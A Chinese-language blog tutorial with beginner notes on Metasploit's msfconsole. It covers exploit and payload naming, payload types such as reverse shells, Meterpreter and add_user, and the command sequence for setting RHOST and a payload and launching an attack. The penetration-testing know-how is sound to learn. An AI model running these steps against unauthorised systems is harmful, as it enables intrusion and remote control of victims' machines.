metasploit 学习与使用

使用msfconsole命令进入msf
我认为重要的两部分是exploit和payload
一个是选择攻击方式一个是选择攻击载荷,合适的攻击方式有利于渗透成功,合适的payload有利于成功之后搭建通道
输入help可以查看使用过程中需要的参数或者指令

show options 显示他有哪些参数
show payloads 查看库
show exploits 就看以看到不同已知漏洞的利用程序
会显示 exploit 名称 等级(rank) 描述

exploit部分
exploit 命名规则:
操作系统/服务/模块名称
例如:windows/vnc/realvnc_client
等级(rank)代表好用的程度
描述就是对漏洞的简单介绍
查看exploit详细:info 模块名
info exploit/windows/wins/ms04_045_wins
选择使用一个模块
use exploit/windows/vnc/realvnc_client
然后列出模块设置参数
show options
options中required的是必须设定的选项
列出exploit 的可攻击目标类型:show targets
设置选项:set 选项名 值 (如 set RHOST 192.168.0.1)
设置攻击目标:set TARGET 编号(如set TARGET2)

payload
payload 就是shellcode 就是在漏洞利用成功后所要创建的攻击载荷
可以使用show payload 来看一下当前的exploit 可以用哪些payload
payloads 命名规则:
操作系统/类型/名称 如:windows/shell/bind_tcp
类型主要有:
shell:得到一个shell
DIIinject: 上传DLL并注入到进程
Patchup***:修补漏洞
Upexec:上传并执行一个文件
Meterpreter:高级payload
Vncinject:高级payload vnc 注入
PassiveX:高级payload
Payloadm名称命名规则:
shell_find_tag:在一个已建立的连接上创建一个shell
shell_reverse_tcp:反向连接到攻击者主机并创建一个shell
bind_tcp:监听一个tcp连接
reverse_tcp:反向建立tcp连接
reverse_http:通过HTTP隧道通信并创建一个新用户添加到管理组
add_user:创建一个新用户并添加到管理组
xxx_ipv6_tcp:基于IPv6
xxx_nonx_tcp:非No execute或win7(NX是应用在CPU的一种可以防止缓冲区溢出的技术)
xxx_ord_tcp:有序payLoad
xxx_tcp_allportsL在所有可能的端口
设计payload:set PAYLOAD payload_name
列出选项还是:show options
之后设置选项:set RHOST 192.168.0.1
这样exploit和payload 就设置完毕了,我们就可以对目标主机进行利用了
set PAYLOAD windows/shell/bind_tcp 进行选择漏洞
设置好相关参数之后,输入exploit或者run即可发起攻击

发布了22 篇原创文章 · 获赞 37 · 访问量 5220

猜你喜欢

转载自blog.csdn.net/weixin_43894771/article/details/104827494